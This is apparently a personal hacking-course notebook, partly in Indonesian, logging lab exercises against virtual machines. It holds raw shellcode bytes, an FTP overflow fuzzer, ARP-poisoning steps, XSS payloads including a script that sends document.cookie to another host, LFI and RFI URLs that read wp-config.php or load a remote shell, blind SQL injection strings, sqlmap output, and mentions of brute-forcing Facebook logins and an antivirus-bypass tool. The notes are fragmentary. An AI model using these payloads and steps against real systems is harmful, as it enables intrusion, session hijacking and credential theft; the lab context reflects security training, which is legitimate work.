Documente Academic
Documente Profesional
Documente Cultură
No t e b o o k: nbctcp's notebook
Cre at e d : 12-Jan-17 10:20 PM U p d at e d : 29-Jan-17 5:26 AM
A u t h o r: Nbctcp Bo
T ag s: Hack
URL: http://xcode.or.id/professional/
-to brute force facebook using dictionary. Need FireForce plugin in FireFox
CMD> tasklist
CMD> taskkill
QUESTIONS:
-virtualbox remote display multiple connection
-adding new metasploit module
# pico 33538
delete this part
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
NOTE:
-kali linux 2u2 ga bisa di VirtualBox karena akan error
-vista dan 2008 harus di VMware kalau di attack pakai MS09-050, kalau pakai VirtualBox blue screen (tested wrong)
-di metasploit, beda shell dan meterpreter adalah shell hanya command DOS, meterpreter bisa upload, download, run webcam etc
-create fuzzer.py
#!/usr/bin/python
import socket
ipaddress = "192.168.1.106"
paket = 200
commanduserftp = "\x41" * (paket)
commandpassftp = "anonymous"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(ipaddress),21))
print s.recv(1024)
s.send("USER "+commanduserftp+"\r\n")
print s.recv(1024)
s.send("PASS "+commandpassftp+"\r\n")
s.close()
...
...
# locate pattern_create.rb
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 1000
or in Kali2 use
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae
25/1
NOTE:
turn off DeepFreeze in XP vm by typing Ctrl+Alt+Shift+F6, then click Boot Thawed. Password pentium2
p500 DOS
STATUS:
VM:
p541 SSLStrip
STATUS:
VM: KALI
p586 HeartBleed
STATUS: OK -> need many login activity so that we can capture the password
VM: KALI UBUNTU13.04.vdi
p593 Cookie
STATUS: OK
VM: WIN7 XPSP2 XP
WIN7=hacker, XPSP2=web server, XP=target
-in XPSP2, WordPress automatically start, , you can proof it by typing http://localhost/blog/wordpress/
-in WIN7 make sure have FireFox ESR with GreaseMonkey plugin
after enable GreaseMonkey plugin install http://userscripts-mirror.org/scripts/show/119798
install Cain&Abel
install WireShark and enable nic Promiscuous Mode: Allow All in VirtualBox
-to change WordPress ip in XPSP2
go to http://localhost/phpmyadmin
L: root
P:
click WordPress on the left bar
click wp_options
click Browse
click Edit on siteurl
change ip there
click on Save\Go
-server WordPress running in XPSP2
-hacker WIN7
run cainabel
click Sniffer
click Host at the bottom
right click/Scan MAC Addresses
click bottom APR
click activate top APR
click top right box
click top +
on the left click user ip i.e 192.168.1.109
on the right click wordpress server ip i.e 192.168.1.111
p604-611
STATUS:
VM: KALI XPSP3
Client side attack
p725 Hercules (remote exploit to bypass WIN10 MS Defender. Can be detected by TrendMicro)
STATUS:
VM: KALI WIN10
# cd /opt
# git clone https://github.com/EgeBalci/HERCULES
-in MIrc to check who in channel Yogyakarta who has ip start with ip 180
/who #yogyakarta *!*@125.*
now
p506 Yersinia
STATUS:
VM: KALI WIN7
p788 DIRBUSTER
Wordlist.txt here is find filename inside wordlist.txt
p824 XSS
STATUS: OK
VM: WINXPSP2
-in WINXPSP2
-Webserver in WINXPSP2 running automatically on startup
open web browser
go to http://192.168.1.32/blogphp
test xss injection
http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/title%3E%3Cmarquee%20b
gcolor=%22red%22%3E%3CH2%3EKurniawan%20ganteng%3C/H2%3E%3C/marquee %3E
result
http://192.168.1.32/blogphp/index.php?search=%22%3E%3C/TITLE%3E%3CIFRAME%2 0src=http://xcode.or.id%3E%3CIFRAME%3E
result
p825 Wapiti
STATUS:
VM: KALI XPSP2
-in KALI
# wapiti http://192.168.1.111/wcms
To test whether this Message box xss vulnerable, we need to test using script
click Settings
click Profile
back to Settings to apply real script
paste below script
script>document.write('<img src="http://192.168.1.105/scriptcokie.php?cookie=' + document.cookie + '" />')</script>
click Update
click Profile
-in KALI
open FireFox and install Tamper Data plugin
open
p853 LFI
STATUS:
VM: XPSP2
-in XPSP2
open firefox
go to http://localhost/blog/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2fwp-config.php
p857 RFI
STATUS:
VM: KALI XPSP2
-in XPSP2
test wordpress running by go to http://192.168.1.111/blog/wordpress/
-in KALI
copy shell.txt into /var/www/html
# wpscan http://192.168.1.111/blog/wordpress/
open firefox and go to
http://192.168.1.111/blog/wordpress/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=http://192.168.1.108/shell.txt?
# wapiti http://192.168.1.32/sinaraccounting
Remote inclusion vulnerability in http://192.168.1.32/sinaraccounting/index.php via injection in the parameter accounting
Evil url: http://192.168.1.32/sinaraccounting/index.php?accounting=http%3A%2F%2Fwww.google.fr%2F%3F
open browser go to
http://192.168.1.32/sinaraccounting/index.php?accounting=http://192.168.1.108/shell.txt?
LAB Extra
STATUS: OK
VM: KALI WINXPSP2
-in KALI
# wapiti http://192.168.1.32/data
Referer: http://192.168.1.32/data/view.php?postid=1
Content-Type: application/x-www-form-urlencoded
nama=default&email=default&website=default&komentar=%3Cscript%3Ealert%28%27wapkdv40pk%27%29%3C%2Fscript%3E&id=1&kirim=Kirim%21
[+] Launching module blindsql
Blind SQL vulnerability in http://192.168.1.32/data/login.php via injection in the query string
Evil url: http://192.168.1.32/data/login.php?%22%20or%20sleep%287%29%3D%22
Blind SQL vulnerability in http://192.168.1.32/data/insert.mhs.php via injection in the query string
Evil url: http://192.168.1.32/data/insert.mhs.php?sleep%287%29%231
-in WINXPSP2
run Hafij
click Tables
click Get Tables
check tbl_user
click Get Column
open browser
go to http://localhost/data/user.php
L: admin
P: 12345
p894 SQLMAP
STATUS:
VM: KALI WINXPSP2
# sqlmap -u http://192.168.1.111/data/view.php?postid=1 -D admin_mhs --tables
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[07:39:45] [INFO] GET parameter 'postid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'postid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0.12
[07:40:34] [INFO] fetching tables for database: 'admin_mhs'
Database: admin_mhs
[7 tables]
+---------------------+
| tbl_artikel |
| tbl_cln_mahasiswa |
| tbl_komentar |
| tbl_mhsiswa |
| tbl_nilai_mahasiswa |
| tbl_user |
| tbl_user_profile |
+---------------------+
[07:40:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.111'
-in WINXPSP2
copy r57.php into E:\xampp\htdocs
install wapiti for windows
> wapiti http://192.168.1.108/sinaraccounting
[+] Launching module file
Remote inclusion vulnerability in http://192.168.1.111/sinaraccounting/index.php via injection in the parameter accounting
Evil url: http://192.168.1.111/sinaraccounting/index.php?accounting=http%3A%2F%2Fwww.google.fr%2F%3F
p956 Antiloris
STATUS:
VM: UBUNTU13.04
p962 ARPON
STATUS:
VM:
-update repository
# apt-get clean && apt-get update && apt-get upgrade -y